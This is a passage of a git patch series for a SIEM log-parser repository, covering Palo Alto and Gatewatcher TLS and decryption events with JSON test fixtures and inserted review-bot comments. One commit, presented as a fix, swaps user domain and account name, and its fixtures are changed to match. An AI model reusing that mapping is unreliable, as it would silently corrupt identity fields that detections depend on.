rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 
2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome 
Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. 
Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:39:51Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "logger": "decryption" + }, + "network": { + "application": "incomplete" + }, + "observer": { + "egress": { + "interface": { + "alias": "INTERNET" + } + }, + "ingress": { + "interface": { + "alias": "VPN-SSL" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1", + "tls": { + "chain_status": "Trusted", + "root_status": "trusted", + "sni": "static.files.example.org" + } + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile", + "uuid": 
"eaf45b26-01ef-496c-990d-bbd1d89f2ed5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 1042 + }, + "port": 58877, + "user": { + "domain": "example", + "name": "jdoe" + } + }, + "tls": { + "curve": "secp256r1", + "server": { + "hash": { + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "x509": { + "issuer": { + "common_name": "GlobalSign ECC OV SSL CA 2018" + } + } + }, + "version": "1.2" + }, + "user": { + "domain": "example", + "name": "jdoe" + } + } +} \ No newline at end of file From c3dd2fd72690727297bbc75a2af3654af6dac91c Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 19:03:17 +0100 Subject: [PATCH 074/150] fix(PaloAlto): add support for DSV Decryption events --- .../paloalto-ngfw/ingest/parser.yml | 118 ++++++++++++++++++ .../tests/test_decryption_csv.json | 98 +++++++++++++++ 2 files changed, 216 insertions(+) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index c4abfd388..944713355 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml 
@@ -425,6 +425,124 @@ pipeline:
 - ClusterName
 delimiter: ","
+ # DECRYPTION CSV
+ - name: parsed_event
+ filter: "{{parsed_dsv.message.Type == 'DECRYPTION'}}"
+ external:
+ name: dsv.parse-dsv
+ properties:
+ input_field: original.message
+ output_field: message
+ columnnames:
+ - PaloAltoDomain
+ - ReceiveTime
+ - DeviceSN
+ - Type
+ - Subtype
+ - ConfigVersion
+ - GenerateTime
+ - SourceAddress
+ - DestinationAddress
+ - NATSourceIP
+ - NATDestinationIP
+ - Rule
+ - SourceUser
+ - DestinationUser
+ - Application
+ - VirtualLocation
+ - SourceZone
+ - DestinationZone
+ - InboundInterface
+ - OutboundInterface
+ - LogAction
+ - TimeLogged
+ - SessionID
+ - RepeatCount
+ - SourcePort
+ - DestinationPort
+ - NATSourcePort
+ - NATDestinationPort
+ - Flags
+ - IPProtocol
+ - Action
+ - Tunnel
+ - FUTURE_USE
+ - FUTURE_USE
+ - SourceVMUUID
+ - DestinationVMUUID
+ - UUIDforrule
+ - StageforClienttoFirewall
+ - StageforFirewalltoServer
+ - TLSVersion
+ - TLSKeyExchange
+ - TLSEncryptionAlgorithm
+ - TLS_AUTH
+ - PolicyName
+ - EllipticCurve
+ - ErrorIndex
+ - RootStatus
+ - ChainStatus
+ - ProxyType
+ - CertificateSerialNumber
+ - Fingerprint
+ - CertificateStartDate
+ - CertificateEndDate
+ - CertificateVersion
+ - CertificateSize
+ - CommonNameLength
+ - IssuerCommonNameLength
+ - RootCommonNameLength
+ - SNILength
+ - CertificateFlags
+ - SubjectCommonName
+ - IssuerSubjectCommonName
+ - RootSubjectCommonName
+ - ServerNameIndication
+ - Error
+ - ContainerID
+ - PODNamespace
+ - PODName
+ - SourceExternalDynamicList
+ - DestinationExternalDynamicList
+ - SourceDynamicAddressGroup
+ - DestinationDynamicAddressGroup
+ - HighResTimestamp
+ - SourceDeviceCategory
+ - SourceDeviceProfile
+ - SourceDeviceModel
+ - SourceDeviceVendor
+ - SourceDeviceOSFamily
+ - SourceDeviceOSVersion
+ - SourceHostname
+ - SourceMACAddress
+ - DestinationDeviceCategory
+ - DestinationDeviceProfile
+ - DestinationDeviceModel
+ - DestinationDeviceVendor
+ - DestinationDeviceOSFamily
+ - DestinationDeviceOSVersion
+ - DestinationHostname
+ - DestinationMACAddress
+ - SequenceNumber
+ - ActionFlags
+ - DGHierarchyLevel1
+ - DGHierarchyLevel2
+ - DGHierarchyLevel3
+ - DGHierarchyLevel4
+ - VirtualSystemName
+ - DeviceName
+ - VirtualSystemID
+ - ApplicationSubcategory
+ - ApplicationCategory
+ - ApplicationTechnology
+ - ApplicationRisk
+ - ApplicationCharacteristic
+ - ApplicationContainer
+ - ApplicationSaaS
+ - ApplicationSanctionedState
+ - ClusterName
+ delimiter: ","
+
 - name: parsed_timestamp
 external:
 name: date.parse
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json
new file mode 100644
index 000000000..6a413f53b
--- /dev/null
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json
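Review bot: Three of the new column names — `UUIDforrule`, `SourceZone` and `DestinationZone` — appear not to be the keys the mapping stage reads: the accompanying test_decryption_csv.json expects neither `rule.uuid` nor `observer.egress/ingress.interface.alias` although the input row carries the rule UUID and both zones, while the JSON-formatted decryption test preceding this commit yields all three. The Prisma Access parser in this series reads `RuleUUID`, `FromZone` and `ToZone`; if the NGFW mapping stage (outside this hunk) does the same, renaming those three columns would recover the fields — please confirm against that stage. `FUTURE_USE` also appears twice here (the HIPMATCH list added later to the Prisma Access parser repeats this); if dsv.parse-dsv builds a mapping from column names the second value overwrites the first, which is harmless for placeholders but fragile if one of them is later given a real name, so distinct placeholders such as `FUTURE_USE_1`/`FUTURE_USE_2` would be safer. The enclosing pipeline list continues outside the hunk.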
@@ -0,0 +1,98 @@ +{ + "input": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T19:09:43Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "0" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", 
+ "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "NFW-OUT-DCA", + "logger": "decryption" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "NFW-OUT-DCA", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "53", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "tls": { + "chain_status": "Uninspected", + "root_status": "uninspected" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 22814 + }, + "port": 55107, + "user": { + "name": "jdoe" + } + }, + "tls": { + "version": "1.3" + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file From 84cf60f3488d4312a1f07df55bbcd5eae87e2e30 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:14:17 +0100 Subject: [PATCH 075/150] fix(GateWatcher): lint taxonomy --- GateWatcher/aioniq/_meta/fields.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index 07bae26e7..8bc01d294 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml 
@@ -389,16 +389,16 @@ gatewatcher.tls:
 name: gatewatcher.tls
 type: text
-gatewatcher.tls_sni:
- description: This field represents the TLS SNI field in a TLS metadata
- name: gatewatcher.tls_sni
- type: text
-
 gatewatcher.tls_fingerprint:
 description: This field represents the TLS server fingerprint field in a TLS metadata
 name: gatewatcher.tls_fingerprint
 type: text
+gatewatcher.tls_sni:
+ description: This field represents the TLS SNI field in a TLS metadata
+ name: gatewatcher.tls_sni
+ type: text
+
 gatewatcher.ttp:
 description: This field is used for retrohunt alerts
 name: gatewatcher.ttp
From 941d5826e98ca34ac5c66d22b6e2235eafbdf8b6 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Thu, 21 Nov 2024 17:28:16 +0100
Subject: [PATCH 076/150] test(GateWatcher): Improve support of tls events
---
 GateWatcher/aioniq/ingest/parser.yml | 1 +
 GateWatcher/aioniq/tests/sigflow-tls.json | 68 +++++++++++++++++++
 2 files changed, 69 insertions(+)
 create mode 100644 GateWatcher/aioniq/tests/sigflow-tls.json
diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml
index 3cc13d747..869a7f8f3 100644
--- a/GateWatcher/aioniq/ingest/parser.yml
+++ b/GateWatcher/aioniq/ingest/parser.yml
@@ -215,3 +215,4 @@ stages:
 gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}"
 tls.version: "{{json_load.message.tls.version}}"
 tls.server.not_after: "{{json_load.message.tls.notafter}}"
+ tls.server.ja3s: "{{json_load.message.tls.ja3s.hash}}"
diff --git a/GateWatcher/aioniq/tests/sigflow-tls.json b/GateWatcher/aioniq/tests/sigflow-tls.json
new file mode 100644
index 000000000..ff8624608
--- /dev/null
+++ b/GateWatcher/aioniq/tests/sigflow-tls.json
@@ -0,0 +1,68 @@ +{ + "input": { + "message": "{\"uuid\":\"b96777f9-6409-4864-b8a1-452094a93c5d\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"ether\":{\"dest_mac\":\"e6:43:7e:91:1b:92\",\"src_mac\":\"82:df:ee:4f:81:af\"},\"type\":\"suricata\",\"dest_ip\":\"5.6.7.8\",\"src_port\":64809,\"flow_id\":1366008699485799,\"timestamp_analyzed\":\"2024-11-21T13:02:44.291Z\",\"timestamp\":\"2024-11-21T13:02:02.870913+0000\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"event_type\":\"tls\",\"src_ip\":\"1.2.3.4\",\"dest_port\":443,\"in_iface\":\"mon2\",\"tls\":{\"sni\":\"www.microsoft.com\",\"version\":\"TLS 1.3\",\"ja3s\":{\"string\":\"771,4866,43-51\",\"hash\":\"15af977ce25de452b96affa2addb1036\"}},\"@version\":\"1\",\"proto\":\"TCP\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"@timestamp\":\"2024-11-21T13:02:44.291Z\"}\n", + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ v102", + "dialect_uuid": "bba2bed2-d925-440f-a0ce-dbcae04eaf26" + } + } + }, + "expected": { + "message": "{\"uuid\":\"b96777f9-6409-4864-b8a1-452094a93c5d\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"ether\":{\"dest_mac\":\"e6:43:7e:91:1b:92\",\"src_mac\":\"82:df:ee:4f:81:af\"},\"type\":\"suricata\",\"dest_ip\":\"5.6.7.8\",\"src_port\":64809,\"flow_id\":1366008699485799,\"timestamp_analyzed\":\"2024-11-21T13:02:44.291Z\",\"timestamp\":\"2024-11-21T13:02:02.870913+0000\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"event_type\":\"tls\",\"src_ip\":\"1.2.3.4\",\"dest_port\":443,\"in_iface\":\"mon2\",\"tls\":{\"sni\":\"www.microsoft.com\",\"version\":\"TLS 1.3\",\"ja3s\":{\"string\":\"771,4866,43-51\",\"hash\":\"15af977ce25de452b96affa2addb1036\"}},\"@version\":\"1\",\"proto\":\"TCP\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"@timestamp\":\"2024-11-21T13:02:44.291Z\"}\n", + "event": { + "category": [ + "network" + ], + "module": "tls" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 443 + }, + "gatewatcher": { + "event_type": "tls", + "flow_id": "1366008699485799", 
+ "gcap": "gcap-xxxxxxxxx.domain.local", + "gcenter": "gcenter-xxxxxxxx.domain.local", + "timestamp_analyzed": "2024-11-21T13:02:44.291Z", + "tls": "{\"ja3s\": {\"hash\": \"15af977ce25de452b96affa2addb1036\", \"string\": \"771,4866,43-51\"}, \"sni\": \"www.microsoft.com\", \"version\": \"TLS 1.3\"}", + "tls_sni": "www.microsoft.com", + "type": "suricata" + }, + "network": { + "transport": "TCP" + }, + "observer": { + "hostname": "gcap-xxxxxxxxx.domain.local", + "mac": [ + "82:df:ee:4f:81:af", + "e6:43:7e:91:1b:92" + ], + "name": "gcap-xxxxxxxxx.domain.local", + "type": "ids", + "version": "0.2" + }, + "related": { + "hosts": [ + "gcap-xxxxxxxxx.domain.local" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 64809 + }, + "tls": { + "server": { + "ja3s": "15af977ce25de452b96affa2addb1036" + }, + "version": "TLS 1.3" + } + } +} \ No newline at end of file From bd97efb6cdc757fa14e48c692ee1cdcfdc568f23 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:33:23 +0100 Subject: [PATCH 077/150] fix(GateWatcher): lint parser --- GateWatcher/aioniq/ingest/parser.yml | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 869a7f8f3..845abe396 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml 
@@ -206,13 +206,13 @@ stages:
 tls:
 actions:
 - set:
- tls.server.issuer: "{{json_load.message.tls.issuerdn}}"
- tls.server.not_before: "{{json_load.message.tls.notbefore}}"
- tls.server.certificate_chain: "{{json_load.message.tls.chain}}"
- tls.server.subject: "{{json_load.message.tls.subject}}"
- gatewatcher.tls: "{{json_load.message.tls}}"
- gatewatcher.tls_sni: "{{json_load.message.tls.sni}}"
- gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}"
- tls.version: "{{json_load.message.tls.version}}"
- tls.server.not_after: "{{json_load.message.tls.notafter}}"
- tls.server.ja3s: "{{json_load.message.tls.ja3s.hash}}"
+ tls.server.issuer: "{{json_load.message.tls.issuerdn}}"
+ tls.server.not_before: "{{json_load.message.tls.notbefore}}"
+ tls.server.certificate_chain: "{{json_load.message.tls.chain}}"
+ tls.server.subject: "{{json_load.message.tls.subject}}"
+ gatewatcher.tls: "{{json_load.message.tls}}"
+ gatewatcher.tls_sni: "{{json_load.message.tls.sni}}"
+ gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}"
+ tls.version: "{{json_load.message.tls.version}}"
+ tls.server.not_after: "{{json_load.message.tls.notafter}}"
+ tls.server.ja3s: "{{json_load.message.tls.ja3s.hash}}"
From e80062d46eef52b2721efe3f4b17c0a01dace43b Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Thu, 21 Nov 2024 17:45:07 +0100
Subject: [PATCH 078/150] chore(PAloaAlto): name some columns
---
 .../paloalto-prisma-access/ingest/parser.yml | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)
diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
index 113ef7fdb..7c7de00b8 100644
--- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
+++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
@@ -142,7 +142,7 @@ pipeline:
 input_field: original.message
 output_field: message
 columnnames:
- - FUTURE_USER
+ - PaloAltoDomain
 - ReceiveTime
 - DeviceSN
 - Type
@@ -187,12 +187,12 @@ pipeline:
 input_field: original.message
 output_field: message
 columnnames:
- - FUTURE_USE
+ - PaloAltoDomain
 - ReceiveTime
 - DeviceSN
 - Type
 - Subtype
- - FUTURE_USE
+ - ConfigVersion
 - GeneratedTime
 - VirtualLocation
 - EventID
@@ -235,12 +235,12 @@ pipeline:
 input_field: original.message
 output_field: message
 columnnames:
- - FUTURE_USE
+ - PaloAltoDomain
 - ReceiveTime
 - DeviceSN
 - Type
 - Subtype
- - FUTURE_USE
+ - ConfigVersion
 - GeneratedTime
 - VirtualLocation
 - EventID
From 838a83c453d43ea013f72192a71ffd3350af2fba Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Thu, 21 Nov 2024 17:46:41 +0100
Subject: [PATCH 079/150] fix(PaloAlto): fix the definition of the user properties
---
 .../paloalto-prisma-access/ingest/parser.yml | 4 ++--
 .../paloalto-prisma-access/tests/decryption_cef.json | 5 +++--
 .../paloalto-prisma-access/tests/fix_bug_with_int.json | 5 +++--
 .../paloalto-prisma-access/tests/globalprotect_csv_2.json | 5 +++--
 .../paloalto-prisma-access/tests/test_globalprotect.json | 7 ++++---
 .../paloalto-prisma-access/tests/test_userid.json | 6 +++---
 6 files changed, 18 insertions(+), 14 deletions(-)
diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
index 7c7de00b8..84514974e 100644
--- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
+++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
@@ -798,8 +798,8 @@ stages:
 set_finalize_user_name:
 actions:
 - set:
- user.domain: '{{final.user.name.split("\\") | first}}'
- user.name: '{{final.user.name.split("\\") | last}}'
+ user.domain: '{{final.user.name.split("\\") | last}}'
+ user.name: '{{final.user.name.split("\\") | first}}'
 filter: '{{final.user.name != null and "\\" in final.user.name}}'
 - set:
 user.domain: '{{final.user.email.split("@") | first}}'
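Review bot: For the conventional `DOMAIN\account` form these two lines now put the account in `user.domain` and the realm in `user.name`, the inverse of the ECS meaning of those fields, and the updated fixtures show exactly that (`"domain": "xxxxx", "name": "paloaltonetwork"`, `"domain": "JDOE", "name": "test.fr"`). The unchanged email rule just below does the same with `split("@") | first` into `user.domain`, and test_hipmatch_json in this series expects `"domain": "jdoe", "name": "example.org"` for `jdoe@example.org`. Unless the upstream SourceUser values really arrive as `account\realm`, I would keep `user.domain: '{{final.user.name.split("\\") | first}}'` / `user.name: '{{final.user.name.split("\\") | last}}'` and flip the email rule to `| last` for the domain and `| first` for the name — identity fields swapped at ingest silently skew every user-centric detection and investigation built on them. The `set_finalize_user_name` stage continues outside the hunk.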
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json index 1a4fba4b4..b32ea4d13 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json @@ -69,6 +69,7 @@ "1.1.1.1" ], "user": [ + "paloaltonetwork", "xxxxx" ] }, @@ -90,8 +91,8 @@ } }, "user": { - "domain": "paloaltonetwork", - "name": "xxxxx" + "domain": "xxxxx", + "name": "paloaltonetwork" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json index 512ae89e7..37c8000b9 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json @@ -62,6 +62,7 @@ "5.6.7.8" ], "user": [ + "domain", "pusername", "userdest" ] @@ -86,8 +87,8 @@ } }, "user": { - "domain": "domain", - "name": "pusername" + "domain": "pusername", + "name": "domain" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json index e4b1d5fab..e0cb016eb 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json @@ -46,6 +46,7 @@ "88.120.236.74" ], "user": [ + "example.org", "test" ] }, @@ -61,8 +62,8 @@ } }, "user": { - "domain": "example.org", - "name": "test" + "domain": "test", + "name": "example.org" }, "user_agent": { "os": { diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json index f08a677ef..5cc8690a2 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json 
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json @@ -49,7 +49,8 @@ "1.2.3.4" ], "user": [ - "JDOE" + "JDOE", + "test.fr" ] }, "source": { @@ -64,8 +65,8 @@ } }, "user": { - "domain": "test.fr", - "name": "JDOE" + "domain": "JDOE", + "name": "test.fr" }, "user_agent": { "os": { diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json index dee27d0e1..48cbcdca5 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json @@ -44,7 +44,7 @@ "1.2.3.4" ], "user": [ - "JDOE" + "test.fr" ] }, "source": { @@ -53,8 +53,8 @@ "port": 0 }, "user": { - "domain": "test.fr", - "name": "JDOE" + "domain": "JDOE", + "name": "test.fr" } } } \ No newline at end of file From 497fb289a176e5b2a21ed5e52b294cc18afd8120 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:47:10 +0100 Subject: [PATCH 080/150] test(PaloAlto): add test for hipmatch event in json representation --- 